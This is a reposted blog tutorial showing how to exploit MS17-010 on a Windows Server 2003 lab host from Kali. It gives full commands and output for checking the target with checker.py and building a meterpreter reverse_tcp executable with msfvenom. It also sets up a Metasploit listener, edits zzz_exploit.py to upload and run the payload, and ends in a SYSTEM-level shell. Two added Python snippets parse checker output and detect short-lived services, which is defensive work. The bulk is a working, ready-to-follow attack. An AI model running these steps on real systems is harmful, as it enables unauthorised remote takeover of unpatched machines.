
Using MS17-010 to Get a Shell on Windows 2003

程序员文章站 2022-05-15 21:30:19

First, let me introduce two things:


Please be clear about this: attacking someone else's computer without authorization is illegal!

Now, on to today's topic.

First, the target machine is Windows 2003 (x86) with IP address 10.0.3.146; the attacker's machine is Kali with IP address 10.0.3.215.

Then we download an MS17-010 exploit script.

root@kali:~/Desktop# git clone https://github.com/worawit/MS17-010/

After the download finishes, enter the directory:

root@kali:~# cd Desktop/MS17-010/

Then use checker.py to check whether the target is exploitable through this vulnerability and whether a usable named pipe is available:

root@kali:~/Desktop/MS17-010# python checker.py 10.0.3.146
Target OS: Windows Server 2003 R2 3790 Service Pack 2
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (32 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (32 bit)
browser: Ok (32 bit)
root@kali:~/Desktop/MS17-010# 

The pipe named netlogon reports status Ok, which means the vulnerability is exploitable.
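For patch triage, the same checker output can be turned into structured findings per host. The parser below is an added example, not part of the original post or of the MS17-010 repository; the function names and the "The target is patched" wording for the patched case are assumptions. It also records when a pipe opened but the RPC bind behind it was rejected, as happened for netlogon above.

```python
import re

# The checker.py output shown above, embedded so the example runs offline.
SAMPLE = """\
Target OS: Windows Server 2003 R2 3790 Service Pack 2
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (32 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (32 bit)
browser: Ok (32 bit)
"""

# "<pipe>: <status>" with an optional parenthesised detail, e.g. "samr: Ok (32 bit)".
PIPE_RE = re.compile(r"^(\w+): (\S+)(?: \((.*)\))?$")

def parse_checker(text):
    """Parse one host's checker.py output into a dict for patch triage."""
    host = {"os": None, "patched": None, "pipes": {}}
    in_pipes = False
    for line in map(str.strip, text.splitlines()):
        if line.startswith("Target OS:"):
            host["os"] = line.split(":", 1)[1].strip()
        elif line == "The target is not patched":
            host["patched"] = False
        elif line == "The target is patched":  # assumed wording of the patched case
            host["patched"] = True
        elif line.startswith("==="):
            in_pipes = True
        elif in_pipes and (m := PIPE_RE.match(line)):
            name, status, detail = m.groups()
            host["pipes"][name] = {
                "status": status,
                "opened": status == "Ok",
                "bind_rejected": bool(detail) and detail.startswith("Bind context"),
            }
    return host

def triage(host):
    """Return remediation findings for a parsed host, most urgent first."""
    findings = []
    if host["patched"] is False:
        findings.append("missing MS17-010 update")
    opened = sorted(n for n, p in host["pipes"].items() if p["opened"])
    if opened:
        findings.append("named pipes opened by the checker: " + ", ".join(opened))
    return findings
```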

Then generate a backdoor exe file on Kali:

root@kali:~/Desktop# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.3.215  LPORT=4444  -f  exe  -o  /tmp/1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /tmp/1.exe
root@kali:~/Desktop# 

I put the exe file in the /tmp/ directory. The path can be anything, as long as you remember it.

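Then open metasploit and use msf to listen on port 4444. The port can be chosen freely, provided it matches the port used when generating the exe above. The specific commands and their meaning are shown below: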

[i] Database already started
[i] The database appears to be already configured, skipping initialization


                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1796 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

Use the exploit/multi/handler module:

msf > use exploit/multi/handler 

Set the payload to windows/meterpreter/reverse_tcp:

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp

Set the attacker's IP address and listening port. The IP and port here must match the ones used when generating the exe file above:

msf exploit(multi/handler) > set lhost 10.0.3.215
lhost => 10.0.3.215
msf exploit(multi/handler) > set lport 4444
lport => 4444

Start the listener and run it as a background job:

msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.0.3.215:4444 
msf exploit(multi/handler) > 

Checking jobs now shows that the listener is already running:

msf exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://10.0.3.215:4444

msf exploit(multi/handler) > 

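Do not close the msf console. Go back to the /MS17-010/ folder and edit the code in the zzz_exploit.py file.
The file is long, so it is best to open it in a plain text editor and search for smb_pwn(conn, arch) to find the right place, then make the following change: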

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

    # Uncomment these two lines and fill in your own paths:
    smb_send_file(smbConn, '/tmp/1.exe', 'C', '/1.exe')
    service_exec(conn, r'cmd /c c:\\1.exe')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."

Save and exit.
Run the exploit program zzz_exploit.py:

root@kali:~/Desktop/MS17-010# python zzz_exploit.py  10.0.3.146  netlogon
Target OS: Windows Server 2003 R2 3790 Service Pack 2
Groom packets
attempt controlling next transaction on x64
attempt controlling next transaction on x86
success controlling one transaction
Target is x86
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x9711cd48
SESSION: 0xe2be7f10
FLINK: 0x8bd48
InData: 0x8ae28
MID: 0xa
TRANS1: 0x88b50
TRANS2: 0x8ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe2bf4b98
userAndGroupCount: 0x5
userAndGroupsAddr: 0xe2bf4c38
overwriting token UserAndGroups
creating file c:\pwned.txt on the target
Opening SVCManager on 10.0.3.146.....
Creating service ynZf.....
Starting service ynZf.....
The NETBIOS connection with the remote host timed out.
Removing service ynZf.....
ServiceExec Error on: 10.0.3.146
nca_s_proto_error
Done

root@kali:~/Desktop/MS17-010# 

The run succeeded. Back in the msf console, the reverse shell has already arrived:

msf exploit(multi/handler) > 
[*] Sending stage (179779 bytes) to 10.0.3.146
[*] Meterpreter session 1 opened (10.0.3.215:4444 -> 10.0.3.146:1061) at 2018-08-08 16:53:33 +0800

msf exploit(multi/handler) >

Because the listener was running in the background, check sessions; there is now one session:

msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ TEST-7599922A80  10.0.3.215:4444 -> 10.0.3.146:1061 (10.0.3.146)

Switch to session 1:

msf exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > 
meterpreter > sysinfo
Computer        : TEST-7599922A80
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

Finally, we can see that msf has successfully obtained a reverse shell from the target.
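Seen from the target, the run above leaves a trail a defender can correlate: a file written to the root of C:, a randomly named service that starts it through cmd /c and is then removed, and an outbound connection to the listener. The detection sketch below is an added example, not part of the original post; the event schema, field names, function names and every timestamp other than the 16:53:33 session time are assumptions.

```python
import ntpath
from datetime import datetime, timedelta

# Constructed telemetry modelled on the tool output above. The schema and all
# timestamps except the 16:53:33 session time are hypothetical.
EVENTS = [
    {"ts": "2018-08-08T16:53:26", "host": "10.0.3.146", "type": "file_create", "path": r"c:\pwned.txt"},
    {"ts": "2018-08-08T16:53:28", "host": "10.0.3.146", "type": "file_create", "path": r"c:\1.exe"},
    {"ts": "2018-08-08T16:53:31", "host": "10.0.3.146", "type": "service_create",
     "name": "ynZf", "cmd": r"cmd /c c:\\1.exe"},
    {"ts": "2018-08-08T16:53:33", "host": "10.0.3.146", "type": "net_connect",
     "dst": "10.0.3.215", "dport": 4444},
    {"ts": "2018-08-08T16:54:05", "host": "10.0.3.146", "type": "service_delete", "name": "ynZf"},
    # Benign control: a service that is installed and stays installed.
    {"ts": "2018-08-08T09:00:00", "host": "10.0.3.150", "type": "service_create",
     "name": "BackupAgent", "cmd": r"C:\Program Files\Backup\agent.exe"},
]

def _ts(event):
    return datetime.fromisoformat(event["ts"])

def detect_short_lived_services(events, window=timedelta(seconds=60)):
    """Alert when one host creates and deletes a service within `window`.

    Alerts are enriched with recently written files that the service command
    line references and with outbound connections made inside the window.
    """
    events = sorted(events, key=_ts)
    alerts = []
    for ev in events:
        if ev["type"] != "service_create":
            continue
        near = [e for e in events if e["host"] == ev["host"]
                and abs(_ts(e) - _ts(ev)) <= window]
        if not any(e["type"] == "service_delete" and e["name"] == ev["name"]
                   and _ts(e) >= _ts(ev) for e in near):
            continue  # long-lived services are normal; skip them
        cmd = ev["cmd"].lower()
        alerts.append({
            "host": ev["host"],
            "service": ev["name"],
            "dropped_and_run": [e["path"] for e in near if e["type"] == "file_create"
                                and _ts(e) <= _ts(ev)
                                and ntpath.basename(e["path"]).lower() in cmd],
            "outbound": [(e["dst"], e["dport"]) for e in near
                         if e["type"] == "net_connect" and _ts(e) >= _ts(ev)],
        })
    return alerts
```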